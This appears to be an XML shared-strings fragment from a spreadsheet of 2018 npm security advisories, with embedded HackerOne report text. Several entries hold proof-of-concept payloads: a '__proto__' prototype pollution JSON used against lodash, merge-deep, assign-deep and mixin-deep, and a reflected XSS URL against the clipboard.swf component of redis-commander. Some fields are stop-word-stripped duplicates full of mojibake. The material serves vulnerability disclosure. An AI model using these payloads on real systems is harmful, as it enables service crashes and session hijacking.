    <t>vulnerability garanteed least obtain denial service library allow property "toString" "valueOf" replaced "String". breaks express module forces server either crash return 500 every subsequent request.Variable. Server crash server becoming unable respond request guaranteed, significant impact remote code execution achieved cases.</t>
  </si>
  <si>
    <t>Prototype pollution attack (merge-deep)</t>
  </si>
  <si>
    <t>/advisories/580</t>
  </si>
  <si>
    <t>2018-04-24T21:34:57.094+00:00</t>
  </si>
  <si>
    <t>merge-deep</t>
  </si>
  <si>
    <t>https://www.npmjs.com/merge-deep</t>
  </si>
  <si>
    <t>&lt;3.0.1</t>
  </si>
  <si>
    <t>&gt;=3.0.1</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/310708.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As discussed in &lt;a href="/reports/309391"&gt;#309391&lt;/a&gt;, here&amp;#39;s the separate report for each of the library. This one is the information for the merge-deep library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt;&lt;br&gt;
&lt;a href="/redirect?signature=0064d147f49def72a02da2a23af1a757bff2d800&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fmerge-deep" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;merge-deep&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; &lt;br&gt;
Utilities function in all the listed modules can be tricked into modifying the prototype of &amp;quot;Object&amp;quot; when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;The simplest test case to reproduce the issue is the following code snippet. In the code snippet, &amp;quot;malicious_payload&amp;quot; would come from an endpoint which accepts JSON data. &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;var merge = require(&amp;#39;merge-deep&amp;#39;);&lt;br&gt;
var malicious_payload = &amp;#39;{&amp;quot;__proto__&amp;quot;:{&amp;quot;oops&amp;quot;:&amp;quot;It works !&amp;quot;}}&amp;#39;;&lt;/p&gt;
&lt;p&gt;var a = {};&lt;br&gt;
console.log(&amp;quot;Before : &amp;quot; + a.oops);&lt;br&gt;
merge({},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guaranteed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guaranteed, but more significant impact like remote code execution can be achieved in some cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-31T02:54:40.996Z</t>
  </si>
  <si>
    <t>2018-02-15T19:23:24.870Z</t>
  </si>
  <si>
    <t xml:space="preserve">discussed #309391, here"s separate report library. one information merge deep library.  Module  merge deep  Summary   Utilities function listed modules tricked modifying prototype Â« Â»ObjectÂ« Â» when attacker control part structure passed function. let attacker add modify existing property will exist object.  Description   Steps Reproduce   simplest test case reproduce issue following code snippet. code snippet, Â« Â»malicious_payloadÂ« Â» endpoint accepts JSON data.    var merge = require("merge deep"); var malicious_payload = "{Â« Â»__proto__Â« Â» {Â« Â»oopsÂ« Â» Â« Â»It works  Â« Â»}}";  var = {}; console.log(Â« Â»Before   Â« Â» + a.oops); merge({}, JSON.parse(malicious_payload)); console.log(Â« Â»After   Â« Â» + a.oops);   shows attacker add attributes existing object server. Additional attribute used change execution code flow cause error every subsequent request replacing Â« Â»toStringÂ« Â» Â« Â»valueOfÂ« Â».  Impact   vulnerability guaranteed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guaranteed, significant impact remote code execution achieved cases. </t>
  </si>
  <si>
    <t>Prototype pollution attack (assign-deep)</t>
  </si>
  <si>
    <t>/advisories/579</t>
  </si>
  <si>
    <t>2018-04-24T21:33:06.78+00:00</t>
  </si>
  <si>
    <t>assign-deep</t>
  </si>
  <si>
    <t>https://www.npmjs.com/assign-deep</t>
  </si>
  <si>
    <t>&lt;0.4.7</t>
  </si>
  <si>
    <t>&gt;=0.4.7</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/310707.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As discussed in &lt;a href="/reports/309391"&gt;#309391&lt;/a&gt;, here&amp;#39;s the separate report for each of the library. This one is the information for the assign-deep library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="/redirect?signature=20d9fcc1884c4f0db301a7517aa7d9bc5a402cee&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fassign-deep" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;assign-deep&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Utilities function in all the listed modules can be tricked into modifying the prototype of &amp;quot;Object&amp;quot; when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;The simplest test case to reproduce the issue is the following code snippet. In the code snippet, &amp;quot;malicious_payload&amp;quot; would come from an endpoint which accepts JSON data. The test case also works with the &amp;quot;deap.extend&amp;quot; function, the &amp;quot;deap&amp;quot; function and the &amp;quot;deap.clone&amp;quot; function.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;var merge = require(&amp;#39;assign-deep&amp;#39;);&lt;br&gt;
var malicious_payload = &amp;#39;{&amp;quot;__proto__&amp;quot;:{&amp;quot;oops&amp;quot;:&amp;quot;It works !&amp;quot;}}&amp;#39;;&lt;/p&gt;
&lt;p&gt;var a = {};&lt;br&gt;
console.log(&amp;quot;Before : &amp;quot; + a.oops);&lt;br&gt;
merge({},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guaranteed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guaranteed, but more significant impact like remote code execution can be achieved in some cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-31T02:46:39.362Z</t>
  </si>
  <si>
    <t>2018-02-15T19:22:02.862Z</t>
  </si>
  <si>
    <t xml:space="preserve">discussed #309391, here"s separate report library. one information assign deep library.  Module   assign deep  Summary    Utilities function listed modules tricked modifying prototype Â« Â»ObjectÂ« Â» when attacker control part structure passed function. let attacker add modify existing property will exist object.  Description   Steps Reproduce   simplest test case reproduce issue following code snippet. code snippet, Â« Â»malicious_payloadÂ« Â» endpoint accepts JSON data. test case works Â« Â»deap.extendÂ« Â» function, Â« Â»deapÂ« Â» function Â« Â»deap.cloneÂ« Â» function.   var merge = require("assign deep"); var malicious_payload = "{Â« Â»__proto__Â« Â» {Â« Â»oopsÂ« Â» Â« Â»It works  Â« Â»}}";  var = {}; console.log(Â« Â»Before   Â« Â» + a.oops); merge({}, JSON.parse(malicious_payload)); console.log(Â« Â»After   Â« Â» + a.oops);   shows attacker add attributes existing object server. Additional attribute used change execution code flow cause error every subsequent request replacing Â« Â»toStringÂ« Â» Â« Â»valueOfÂ« Â».  Impact   vulnerability guaranteed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guaranteed, significant impact remote code execution achieved cases. </t>
  </si>
  <si>
    <t>Prototype pollution attack (mixin-deep)</t>
  </si>
  <si>
    <t>/advisories/578</t>
  </si>
  <si>
    <t>2018-04-24T21:30:28.128+00:00</t>
  </si>
  <si>
    <t>mixin-deep</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mixin-deep</t>
  </si>
  <si>
    <t>&lt;1.3.1</t>
  </si>
  <si>
    <t>&gt;=1.3.1</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/311236.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As discussed in &lt;a href="/reports/309391"&gt;#309391&lt;/a&gt;, here&amp;#39;s the separate report for each of the library. This one is the information for the mixin-deep library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="/redirect?signature=d9da99b99165a31a81671ddf78feec0fd4e4e988&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fmixin-deep" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;mixin-deep&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Utilities function in all the listed modules can be tricked into modify the prototype of &amp;quot;Object&amp;quot; when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; &lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;The simplest test case to reproduce the issue is the following code snippet. In the code snippet, &amp;quot;malicious_payload&amp;quot; would come from an endpoint which accepts JSON data. &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;var merge = require(&amp;#39;mixin-deep&amp;#39;);&lt;br&gt;
var malicious_payload = &amp;#39;{&amp;quot;__proto__&amp;quot;:{&amp;quot;oops&amp;quot;:&amp;quot;It works !&amp;quot;}}&amp;#39;;&lt;/p&gt;
&lt;p&gt;var a = {};&lt;br&gt;
console.log(&amp;quot;Before : &amp;quot; + a.oops);&lt;br&gt;
merge({},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garanteed, but more significant impact like remote code execution can be achieved in some cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-01T00:21:10.537Z</t>
  </si>
  <si>
    <t>2018-02-15T19:20:15.945Z</t>
  </si>
  <si>
    <t xml:space="preserve">discussed #309391, here"s separate report library. one information mixin deep library.  Module   mixin deep  Summary   Utilities function listed modules tricked modify prototype Â« Â»ObjectÂ« Â» when attacker control part structure passed function. let attacker add modify existing property will exist object.  Description    Steps Reproduce   simplest test case reproduce issue following code snippet. code snippet, Â« Â»malicious_payloadÂ« Â» endpoint accepts JSON data.    var merge = require("mixin deep"); var malicious_payload = "{Â« Â»__proto__Â« Â» {Â« Â»oopsÂ« Â» Â« Â»It works  Â« Â»}}";  var = {}; console.log(Â« Â»Before   Â« Â» + a.oops); merge({}, JSON.parse(malicious_payload)); console.log(Â« Â»After   Â« Â» + a.oops);   shows attacker add attributes existing object server. Additional attribute used change execution code flow cause error every subsequent request replacing Â« Â»toStringÂ« Â» Â« Â»valueOfÂ« Â».  Impact   vulnerability garanteed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garanteed, significant impact remote code execution achieved cases. </t>
  </si>
  <si>
    <t>Prototype pollution attack (lodash)</t>
  </si>
  <si>
    <t>/advisories/577</t>
  </si>
  <si>
    <t>2018-04-24T21:27:02.796+00:00</t>
  </si>
  <si>
    <t>lodash</t>
  </si>
  <si>
    <t>https://www.npmjs.com/lodash</t>
  </si>
  <si>
    <t>&lt;4.17.5</t>
  </si>
  <si>
    <t>&gt;=4.17.5</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/310443.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As discussed in &lt;a href="/reports/309391"&gt;#309391&lt;/a&gt;, here&amp;#39;s the separate report for each of the library. This one is the information for the lodash library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="/redirect?signature=b4449afe8c6b8fe3a16046b5b2c128cd219d1a58&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Flodash" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;lodash&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Utilities function in all the listed modules can be tricked into modify the prototype of &amp;quot;Object&amp;quot; when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; [add more details about this vulnerability]&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;The simplest test case to reproduce the issue is the following code snippet. In the code snippet, &amp;quot;malicious_payload&amp;quot; would come from an endpoint which accepts JSON data. The test case also works with the &amp;quot;&lt;u&gt;.mergeWith&amp;quot; function and the &amp;quot;&lt;/u&gt;.defaultsDeep&amp;quot; function.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;var _= require(&amp;#39;lodash&amp;#39;);&lt;br&gt;
var malicious_payload = &amp;#39;{&amp;quot;__proto__&amp;quot;:{&amp;quot;oops&amp;quot;:&amp;quot;It works !&amp;quot;}}&amp;#39;;&lt;/p&gt;
&lt;p&gt;var a = {};&lt;br&gt;
console.log(&amp;quot;Before : &amp;quot; + a.oops);&lt;br&gt;
_.merge({}, JSON.parse(malicious_payload));&lt;br&gt;
console.log(&amp;quot;After : &amp;quot; + a.oops);&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This shows that an attacker can add attributes to all existing object on the server. Additional attribute can be used to change the execution code flow or cause error on every subsequent request by replacing &amp;quot;toString&amp;quot; or &amp;quot;valueOf&amp;quot;.&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact:&lt;/h2&gt;
&lt;p&gt;This vulnerability is garanteed to at least obtain denial of service as all the library allow the property &amp;quot;toString&amp;quot; and &amp;quot;valueOf&amp;quot; to be replaced by a &amp;quot;String&amp;quot;. This breaks the express module and forces the server to either crash or return a 500 to every subsequent request.&lt;/p&gt;
&lt;p&gt;More complex payload can be crafted to gain remote code execution (see PoC in &lt;a href="/reports/309391"&gt;#309391&lt;/a&gt;).&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;If extra information is needed don&amp;#39;t hesitate to ask.&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;Variable. Server crash or the server becoming unable to respond to all request is garanteed, but more significant impact like remote code execution can be achieved in some cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-30T06:36:13.866Z</t>
  </si>
  <si>
    <t>2018-02-13T19:23:26.400Z</t>
  </si>
  <si>
    <t xml:space="preserve">discussed #309391, here"s separate report library. one information lodash library.  Module   lodash  Summary   Utilities function listed modules tricked modify prototype Â« Â»ObjectÂ« Â» when attacker control part structure passed function. let attacker add modify existing property will exist object.  Description  [add details vulnerability]  Steps Reproduce   simplest test case reproduce issue following code snippet. code snippet, Â« Â»malicious_payloadÂ« Â» endpoint accepts JSON data. test case works Â« Â».mergeWithÂ« Â» function Â« Â».defaultsDeepÂ« Â» function.   var _= require("lodash"); var malicious_payload = "{Â« Â»__proto__Â« Â» {Â« Â»oopsÂ« Â» Â« Â»It works  Â« Â»}}";  var = {}; console.log(Â« Â»Before   Â« Â» + a.oops); _.merge({}, JSON.parse(malicious_payload)); console.log(Â« Â»After   Â« Â» + a.oops);   shows attacker add attributes existing object server. Additional attribute used change execution code flow cause error every subsequent request replacing Â« Â»toStringÂ« Â» Â« Â»valueOfÂ« Â».  Impact   vulnerability garanteed least obtain denial service library allow property Â« Â»toStringÂ« Â» Â« Â»valueOfÂ« Â» replaced Â« Â»StringÂ« Â». breaks express module forces server either crash return 500 every subsequent request.  complex payload crafted gain remote code execution (see PoC #309391).  Supporting Material/References   extra information needed don"t hesitate ask.  Impact  Variable. Server crash server becoming unable respond request garanteed, significant impact remote code execution achieved cases. </t>
  </si>
  <si>
    <t>/advisories/576</t>
  </si>
  <si>
    <t>2018-04-24T21:21:37.524+00:00</t>
  </si>
  <si>
    <t>html-janitor</t>
  </si>
  <si>
    <t>https://www.npmjs.com/html-janitor</t>
  </si>
  <si>
    <t>Failure to sanitize quotes which can lead to sql injection</t>
  </si>
  <si>
    <t>/advisories/575</t>
  </si>
  <si>
    <t>2018-04-21T04:52:43.696+00:00</t>
  </si>
  <si>
    <t>squel</t>
  </si>
  <si>
    <t>https://www.npmjs.com/squel</t>
  </si>
  <si>
    <t>Regular Expression Denial of Service (ReDoS)</t>
  </si>
  <si>
    <t>/advisories/572</t>
  </si>
  <si>
    <t>2018-04-21T04:45:29.766+00:00</t>
  </si>
  <si>
    <t>is-my-json-valid</t>
  </si>
  <si>
    <t>https://www.npmjs.com/is-my-json-valid</t>
  </si>
  <si>
    <t>&lt;1.4.1 || &gt;=2.0.0 &lt;2.17.2</t>
  </si>
  <si>
    <t>&gt;=1.4.1 &lt;2.0.0 || &gt;=2.17.2</t>
  </si>
  <si>
    <t>Directory Traversal</t>
  </si>
  <si>
    <t>/advisories/571</t>
  </si>
  <si>
    <t>2018-04-21T04:43:09.12+00:00</t>
  </si>
  <si>
    <t>&lt;=0.1.2</t>
  </si>
  <si>
    <t>&gt;=0.1.3</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) - Stored</t>
  </si>
  <si>
    <t>/advisories/570</t>
  </si>
  <si>
    <t>2018-04-21T04:40:18.321+00:00</t>
  </si>
  <si>
    <t>crud-file-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/crud-file-server</t>
  </si>
  <si>
    <t>&lt;=0.7.0</t>
  </si>
  <si>
    <t>&gt;=0.8.0</t>
  </si>
  <si>
    <t>Bypassing Sanitization using DOM clobbering</t>
  </si>
  <si>
    <t>/advisories/569</t>
  </si>
  <si>
    <t>2018-04-21T04:37:50.923+00:00</t>
  </si>
  <si>
    <t>&lt;=2.0.2</t>
  </si>
  <si>
    <t>Sandbox Bypass Leading to Arbitrary Code Execution</t>
  </si>
  <si>
    <t>/advisories/568</t>
  </si>
  <si>
    <t>2018-04-21T04:33:52.489+00:00</t>
  </si>
  <si>
    <t>constantinople</t>
  </si>
  <si>
    <t>https://www.npmjs.com/constantinople</t>
  </si>
  <si>
    <t>&lt;3.1.1</t>
  </si>
  <si>
    <t>&gt;=3.1.1</t>
  </si>
  <si>
    <t>Code Execution by Re-enabling Node.js integration</t>
  </si>
  <si>
    <t>/advisories/574</t>
  </si>
  <si>
    <t>2018-03-25T22:21:34.822+00:00</t>
  </si>
  <si>
    <t>electron</t>
  </si>
  <si>
    <t>https://www.npmjs.com/electron</t>
  </si>
  <si>
    <t>&lt;= 1.7.12 || &gt;=1.8.0 &lt;= 1.8.3 || &gt;=2.0.0-beta.1 &lt;= 2.0.0-beta.4</t>
  </si>
  <si>
    <t>1.7.13 &lt; 1.8.0 || 1.8.4 &lt; 2.0.0 || &gt;=2.0.0-beta.5</t>
  </si>
  <si>
    <t>/advisories/573</t>
  </si>
  <si>
    <t>2018-03-08T19:41:14.147+00:00</t>
  </si>
  <si>
    <t>resolve-path</t>
  </si>
  <si>
    <t>https://www.npmjs.com/resolve-path</t>
  </si>
  <si>
    <t>&lt;1.4.0</t>
  </si>
  <si>
    <t>&gt;=1.4.0</t>
  </si>
  <si>
    <t>Authentication bypass via incorrect XML canonicalization and DOM traversal</t>
  </si>
  <si>
    <t>/advisories/567</t>
  </si>
  <si>
    <t>2018-02-27T22:32:52.317+00:00</t>
  </si>
  <si>
    <t>saml2-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/saml2-js</t>
  </si>
  <si>
    <t>&lt;= 1.12.3 || &gt;= 2.0.0 &lt;=2.0.1</t>
  </si>
  <si>
    <t>&gt;= 1.12.4 &lt; 2.0.0 || &gt;= 2.0.2</t>
  </si>
  <si>
    <t>Prototype pollution attack</t>
  </si>
  <si>
    <t>/advisories/566</t>
  </si>
  <si>
    <t>2018-02-15T16:59:37.24+00:00</t>
  </si>
  <si>
    <t>hoek</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hoek</t>
  </si>
  <si>
    <t>&lt;= 4.2.0 || &gt;= 5.0.0 &lt; 5.0.3</t>
  </si>
  <si>
    <t>&gt; 4.2.0 &lt; 5.0.0 || &gt;= 5.0.3</t>
  </si>
  <si>
    <t>ReDoS in ssri</t>
  </si>
  <si>
    <t>/advisories/565</t>
  </si>
  <si>
    <t>2018-02-14T20:39:06.993+00:00</t>
  </si>
  <si>
    <t>ssri</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ssri</t>
  </si>
  <si>
    <t>&lt;=5.2.1</t>
  </si>
  <si>
    <t>&gt;=5.2.2</t>
  </si>
  <si>
    <t>Fastify denial-of-service vulnerability with large JSON payloads</t>
  </si>
  <si>
    <t>/advisories/564</t>
  </si>
  <si>
    <t>2018-01-25T17:24:36.306+00:00</t>
  </si>
  <si>
    <t>fastify</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fastify</t>
  </si>
  <si>
    <t>&lt;=0.37.0</t>
  </si>
  <si>
    <t>&gt;=0.38.0</t>
  </si>
  <si>
    <t>Remote Code Execution</t>
  </si>
  <si>
    <t>/advisories/563</t>
  </si>
  <si>
    <t>2018-01-23T18:57:03.334+00:00</t>
  </si>
  <si>
    <t>&lt; 1.6.16 || &gt;=1.7 &lt;1.7.11 || &gt;= 1.8 &lt;1.8.2-beta.4</t>
  </si>
  <si>
    <t>&gt;=1.6.16 &lt;1.7.0|| &gt;=1.7.11 &gt; 1.8.0 || &gt;=1.8.2-beta.4</t>
  </si>
  <si>
    <t>[redis-commander] Reflected SWF XSS via vulnerable "clipboard.swf" component</t>
  </si>
  <si>
    <t>/advisories/562</t>
  </si>
  <si>
    <t>2018-01-23T17:42:42.631+00:00</t>
  </si>
  <si>
    <t>redis-commander</t>
  </si>
  <si>
    <t>https://www.npmjs.com/redis-commander</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/296377.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi,&lt;/p&gt;
&lt;p&gt;An injection in the &lt;code&gt;highlighterId&lt;/code&gt; parameter of the &lt;code&gt;clipboard.swf&lt;/code&gt; component can be used to reflect JavaScript in the context of hosts running Redis Commander.&lt;/p&gt;
&lt;h2 id="module-specification"&gt;Module specification&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name&lt;/strong&gt;: &lt;a href="/redirect?signature=6c1bc79a460f1f1fa634d4401174c9935ba715a1&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fredis-commander" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;redis-commander&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Version&lt;/strong&gt;: 0.4.5 (latest release build)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="verified-conditions"&gt;Verified conditions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Test server:&lt;/strong&gt; Ubuntu 16.04 LTS&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Browser version:&lt;/strong&gt; Firefox 57.0 (64-bit)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Flash version:&lt;/strong&gt; 27.0.0.187&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="proof-of-concept"&gt;Proof of concept&lt;/h2&gt;
&lt;p&gt;Please globally install the &lt;code&gt;redis-commander&lt;/code&gt; package and run &lt;code&gt;redis-commander -p 80&lt;/code&gt; to start serving the Commander interface.&lt;/p&gt;
&lt;p&gt;To reproduce this vulnerability, please access the below URL in a browser with Adobe Flash enabled and &lt;strong&gt;click on the content&lt;/strong&gt; which appears.&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://instance/jstree/_docs/syntax/clipboard.swf?highlighterId=\%22))}%20catch(e)%20{alert(document.domain);}//
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="redis_swf_xss.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/245/319/de23b113cf17ca82551bc94d0253038bcc00bc4f/redis_swf_xss.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIZ26ZMKPQLNXZHRA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFkaDB%2Fv%2BN9SSpwpVea%2FKCK3A%2BSuBzuhTrhwR5nEi3I0b11mgtOz%2B%2FirUFG2jha6LAKQkkZHoxw1C%2Fif82UJl2RRNsWJVfyI5zUoH2Bxp3RDtIyvtQTzNq4y46c83kyLiVIEPnDZkY7wOJXqSs3QbAMIs%2FurBeBmpBHX87ZgSbxKMyw85T8IW2LM99Aqn3IjrgZkQhyoqaJMI%2F735KwUH6L1MeAmq8SDjJHhgOzviNuCnL3POjNFnpn%2Fy9n5AhpZWHEViNXVr4gaN%2F9Ypp1l4L1edRKd58rsTZB8jheGLIC2VfOsKp8TzA2Zsn%2B6Uf1K2ievYdpP6f6o4ZcSeXipgj1wspbfE9hnc5KNW9Scq3uTZ0WKLWruX2JJlAlSh%2Bnd1DtaJvX1r2uGMfW19WX%2BtL1VTonXfgBVZRxsqJt3XgewH9mBtLLK1J0H2cWH%2FVUXCWY1bhDE5CDzwKQgemIz8YBYNxss8duiaxJPvlClq8F2twzPQBKwsvGzZxWCLPBOmigt54lT9y3FFHbFG8zyF%2FDP0cK%2BnL214WKIfIcJbuFEdqLi4muRSbH98bSkoeMN2H%2Ffv5CiQ5qKtimsbgxvrdut14nsk0yk5yoo9NHs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=b1b8ae49bff9a12b0c779926557f53893d11bb6b14cb06d660992fa11c7e8839" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/245/319/de23b113cf17ca82551bc94d0253038bcc00bc4f/redis_swf_xss.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIZ26ZMKPQLNXZHRA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFkaDB%2Fv%2BN9SSpwpVea%2FKCK3A%2BSuBzuhTrhwR5nEi3I0b11mgtOz%2B%2FirUFG2jha6LAKQkkZHoxw1C%2Fif82UJl2RRNsWJVfyI5zUoH2Bxp3RDtIyvtQTzNq4y46c83kyLiVIEPnDZkY7wOJXqSs3QbAMIs%2FurBeBmpBHX87ZgSbxKMyw85T8IW2LM99Aqn3IjrgZkQhyoqaJMI%2F735KwUH6L1MeAmq8SDjJHhgOzviNuCnL3POjNFnpn%2Fy9n5AhpZWHEViNXVr4gaN%2F9Ypp1l4L1edRKd58rsTZB8jheGLIC2VfOsKp8TzA2Zsn%2B6Uf1K2ievYdpP6f6o4ZcSeXipgj1wspbfE9hnc5KNW9Scq3uTZ0WKLWruX2JJlAlSh%2Bnd1DtaJvX1r2uGMfW19WX%2BtL1VTonXfgBVZRxsqJt3XgewH9mBtLLK1J0H2cWH%2FVUXCWY1bhDE5CDzwKQgemIz8YBYNxss8duiaxJPvlClq8F2twzPQBKwsvGzZxWCLPBOmigt54lT9y3FFHbFG8zyF%2FDP0cK%2BnL214WKIfIcJbuFEdqLi4muRSbH98bSkoeMN2H%2Ffv5CiQ5qKtimsbgxvrdut14nsk0yk5yoo9NHs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=b1b8ae49bff9a12b0c779926557f53893d11bb6b14cb06d660992fa11c7e8839" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Yasin&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;An adversary can leverage this vulnerability in a crafted request that, if issued by another Redis Commander user, will cause arbitrary JavaScript code to execute within the target&amp;#39;s browser in the context of their session.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2017-12-08T20:43:21.737Z</t>
  </si>
  <si>
    <t>2018-01-23T09:52:52.622Z</t>
  </si>
  <si>
    <t>An adversary can leverage this vulnerability in a crafted request that, if issued by another Redis Commander user, will cause arbitrary JavaScript code to execute within the target's browser in the context of their session.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  injection highlighterId parameter component used reflect JavaScript context hosts running Redis Commander.  Module specification    Name  redis commander   Version  0.4.5 (latest release build)   Verified conditions    Test server  Ubuntu 16.04 LTS  Browser version  Firefox 57.0 (64 bit)  Flash version    Proof concept  Please globally install redis commander package run redis commander  p 80 start serving Commander interface.  reproduce vulnerability, please access below URL browser Adobe Flash enabled click content appears. http //instance/jstree/_docs/syntax/clipboard.swf?highlighterId= %22))}%20catch(e)%20{alert(document.domain);}//    Thanks,  Yasin  Impact  adversary leverage vulnerability crafted request that, issued Redis Commander user, will cause arbitrary JavaScript code execute within target"s browser context session. </t>
  </si>
  <si>
    <t>adversary leverage vulnerability crafted request that, issued Redis Commander user, will cause arbitrary JavaScript code execute within target's browser context session.</t>
  </si>
  <si>
    <t>/advisories/561</t>
  </si>
  <si>
    <t>2018-01-23T17:02:39.653+00:00</t>
  </si>
  <si>
    <t>&lt;=6.4.8</t>
  </si>
  <si>
    <t>&gt;=6.4.9</t>
  </si>
  <si>
    <t>/advisories/411</t>
  </si>
  <si>
    <t>2018-01-23T16:43:20.402+00:00</t>
  </si>
  <si>
    <t>ltt.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ltt.js</t>
  </si>
  <si>
    <t>/advisories/451</t>
  </si>
  <si>
